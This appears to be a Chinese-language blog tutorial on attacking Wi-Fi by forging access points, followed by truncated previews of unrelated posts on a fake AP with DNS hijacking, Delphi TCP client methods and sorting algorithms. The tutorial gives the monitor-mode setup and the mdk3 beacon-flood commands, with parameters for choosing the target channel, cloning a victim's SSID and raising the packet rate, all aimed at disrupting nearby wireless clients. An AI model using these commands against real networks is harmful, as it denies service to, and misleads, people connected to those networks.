偽造ap攻擊的方法具體表現有很多,這裡演示偽造合法ap和惡意建立大量虛假ap訊號。
偽造大量虛假ap訊號:
如果目的是要干擾正常無線通訊,那麼無線黑客也可以通過建立大量虛假ap基站訊號來實現。
具體可以使用mdk3這款工具實現,kalilinux裡面可以通過無線網絡卡發射隨機偽造的ap訊號,並可以根據需要設定偽造的ap的工作頻道,一般設定為干擾目標ap的同一頻道。
具體命令如下:
mdk3 網絡卡 b -g -c 6 -h 7
引數解釋:
網絡卡:此處用於輸入當前的網絡卡的名稱,這裡是mon0
b:用於偽造啊p時使用的模式
-g:偽造成提供54m即滿足802.11g標準的無線網路。
-c:num針對的無線工作頻道,這裡是6.
-h:num用於提公升攻擊效率,不過只針對個別無線裝置有效,可以不使用該引數。
啟用網絡卡命令:ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0
對於在某一頻道正常工作的無線接入點,攻擊者除了可以傳送相同頻道外,甚至還可以傳送相同ssid的無線資料流量訊號,來擾亂連線該ap的無線客戶端的正常運作,具體命令如下:
mdk3 網絡卡 b -n tp-link -g -c 6
其中,-n 是ssid使用指定的ssid來替代隨機生成的ssid,該引數使得提供更有針對性。
提公升發包速度:
mdk3 網絡卡 b -n tp-link -g -c 6 -s 200
其中,-s為傳送資料報速率,但並不準確,這裡輸入的為200,實際發包速率會保持在150---250個包/秒
偽造無線AP熱點流程,DNS劫持
第二步 偽造ap 安裝無線網絡卡橋接包 apt get install bridge utils 新增網橋 brctl addbr bridge 先把連線網路的網絡卡新增到網橋裡面 brctl addif bridge eth0 eth0 是已經連線網路的網絡卡,可以是有線網絡卡或者無線網絡卡 把自...
TIdTCPClient的幾種方法
其實indy比較簡單,但是可以提供的方法太多了。我找了很久,才搞明白。比方說這個讀取緩衝區的資料,就有很多種方法。相對於ttcpclient的幾種方法來說,tidtcpclient確實提供了多種選擇,不仔細研究真的容易糊塗 其實我比較喜歡用currentreadbuffer 1 readfromst...
排序的幾種方法
三種排序 選擇排序,氣泡排序,插入排序 的總結 1.選擇排序 1 public class demo3 遍歷排序前的數值 for int i 0 i num.length 1 i 如果最小值的標號未改變,代表本身已是最小值,否則交換數值 if min i 遍歷排序後的數值 for int i 0 i...